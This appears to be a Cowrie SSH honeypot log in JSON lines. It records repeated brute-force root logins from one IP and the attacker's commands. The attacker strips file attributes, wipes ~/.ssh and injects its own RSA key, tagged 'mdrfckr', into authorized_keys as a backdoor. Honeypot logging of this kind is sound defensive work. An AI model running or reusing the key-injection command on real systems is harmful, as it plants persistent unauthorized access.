{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:37.204212Z","src_ip":"212.227.235.229","session":"9d3d4e371723"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:37.619849Z","src_ip":"212.227.235.229","session":"9d3d4e371723"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:37.623493Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52404,"dst_ip":"1.2.3.4","dst_port":22,"session":"a967bc9afbc1","protocol":"ssh","message":"New connection: 212.227.235.229:52404 (1.2.3.4:22) [session: a967bc9afbc1]","sensor":"my-vps","timestamp":"2025-09-09T06:23:38.040680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:38.041653Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:38.277078Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.login.success","username":"root","password":"1324","message":"login attempt [root/1324] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:39.259267Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:39.802619Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:39.803335Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:39.804277Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:40.040725Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:40.532320Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:40.533269Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:40.770761Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:40.771895Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52420,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6fdd4c2e418","protocol":"ssh","message":"New connection: 212.227.235.229:52420 (1.2.3.4:22) [session: b6fdd4c2e418]","sensor":"my-vps","timestamp":"2025-09-09T06:23:41.004915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:41.005596Z","src_ip":"212.227.235.229","session":"b6fdd4c2e418"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:41.239810Z","src_ip":"212.227.235.229","session":"b6fdd4c2e418"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:42.220348Z","src_ip":"212.227.235.229","session":"b6fdd4c2e418"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:43.456670Z","src_ip":"212.227.235.229","session":"b6fdd4c2e418"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52426,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9c7139fe321","protocol":"ssh","message":"New connection: 212.227.235.229:52426 (1.2.3.4:22) [session: c9c7139fe321]","sensor":"my-vps","timestamp":"2025-09-09T06:23:43.688833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:43.689614Z","src_ip":"212.227.235.229","session":"c9c7139fe321"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:43.922821Z","src_ip":"212.227.235.229","session":"c9c7139fe321"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:44.899383Z","src_ip":"212.227.235.229","session":"c9c7139fe321"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:45.134162Z","src_ip":"212.227.235.229","session":"c9c7139fe321"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:45.135216Z","src_ip":"212.227.235.229","session":"a967bc9afbc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53975,"dst_ip":"1.2.3.4","dst_port":22,"session":"71fa5747262f","protocol":"ssh","message":"New connection: 212.227.235.229:53975 (1.2.3.4:22) [session: 71fa5747262f]","sensor":"my-vps","timestamp":"2025-09-09T06:23:49.706232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:49.709257Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:50.080771Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvbnm","message":"login attempt [root/zxcvbnm] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:51.643118Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53110,"dst_ip":"1.2.3.4","dst_port":22,"session":"1be33f00d208","protocol":"ssh","message":"New connection: 212.227.235.229:53110 (1.2.3.4:22) [session: 1be33f00d208]","sensor":"my-vps","timestamp":"2025-09-09T06:23:51.899447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:51.905414Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:52.076482Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:52.455031Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:52.455822Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:52.456885Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx#edc","message":"login attempt [root/1qaz2wsx#edc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:52.806061Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.157945Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:53.174966Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.175632Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.176484Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:53.618797Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.619651Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.622387Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:53.868820Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.869649Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.994276Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:53.995289Z","src_ip":"212.227.235.229","session":"71fa5747262f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.043751Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.044817Z","src_ip":"212.227.235.229","session":"1be33f00d208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53988,"dst_ip":"1.2.3.4","dst_port":22,"session":"3947c7a9f815","protocol":"ssh","message":"New connection: 212.227.235.229:53988 (1.2.3.4:22) [session: 3947c7a9f815]","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.211010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.211657Z","src_ip":"212.227.235.229","session":"3947c7a9f815"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54400,"dst_ip":"1.2.3.4","dst_port":22,"session":"737cb82b8b57","protocol":"ssh","message":"New connection: 212.227.235.229:54400 (1.2.3.4:22) [session: 737cb82b8b57]","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.357988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:54.359121Z","src_ip":"212.227.235.229","session":"737cb82b8b57"}
